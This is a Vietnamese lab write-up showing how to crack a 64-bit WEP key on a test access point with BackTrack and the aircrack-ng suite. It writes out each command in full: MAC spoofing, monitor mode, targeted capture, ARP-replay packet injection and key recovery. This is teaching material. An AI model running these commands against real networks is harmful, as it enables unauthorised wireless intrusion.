LAP: CRACK WEP KEY BẮNG CARD CISCO CHIPSET AIRONET
(SVTT : GTVT)vTHIẾT BỊ THỰC HÀNH:
Một access point được cấu hình bảo mật WEP pre_shared key 64 bits và một PC có card wireless của Cisco làm attacker.
Một đĩa CD backtrack 3.0 beta
vCÁC BƯỚC THỰC HIỆN:
Sau khi boot PC từ đĩa CD backtrack thành công và tiến hành các bước sau:
·Bước1: Start chương trình airmon-ng để đổi địa chỉ MAC address của card wireless bằng các câu lệnh
Airmon-ng stop ath0
Ifconfig wifi0 down
Macchanger --mac 00:11:22:33:44:55 wifi0
Xem hình minh hoạ:
·Bước 2: chuyển card wireless về chế độ monitor bằng lệnh:
Airmon-ng start wifi0
·Bước 3: Dò và xác định các thông số của AP target bằng chương trình airodump-ng
Airodump-ng ath0
kết qủa dò tìm như hình sau. Ta chú ý các thông số BSSID, kênh, kiểu mã hoá.
·Bước 4: Dùng airodump-ng để capture gói tin dựa vào các thông số trên bằng lệnh:
airodump-ng -c 1 –w/root/desktop/capture/wep64 –bssid 00:14:bf:05:d6:0c ath0
-c 1 : kênh phát của AP target là kênh 1
/root/desktop/capture/wep64: đường dẫn lưu file capture
00:14:bf:05:d6:0c : MAC address của AP target
·Bước 5: Dùng chương trình aireplay-ng để tim gói đến AP nhằm tăng lưu lượng gói để capture nhanh hơn.
Aireplay-ng -3 -b 00:14:bf:05:d6:0c –h 00:11:22:33:44:55 ath0
Quá trình tim gói như hình sau:
·Trở lại màn hình airodump để quan sát quá trình bắt gói. Trong bài lap này, với số gói là 10333 (mất khoảng 15s ) thì có thể tìm được khoá
·Dùng chương trình aircrack-ng để tìm ra khoá.
Aircrack-ng –n 64 --bssid 00:14:bf:05:d6:0c /root/desktop/capture/wep64-01.cap
Quan sát quá trình phân tích và tìm khoá như hình sau:
CRACK WEP KEY 128 BITS:
Quá trình crack wep 128 bits bao gồm các bước thực hiện hoàn toàn tương tự như việc crack wep 64 bits. Chỉ khác là ta cần capture nhiều gói tin hơn. Để crack được wep 128 bits, ta cần tối thiểu khoảng 1100000 packets (mất khoảng 40 phút và cần khoảng 5000 ivs).
Chúc mọi người vui !!!
Comment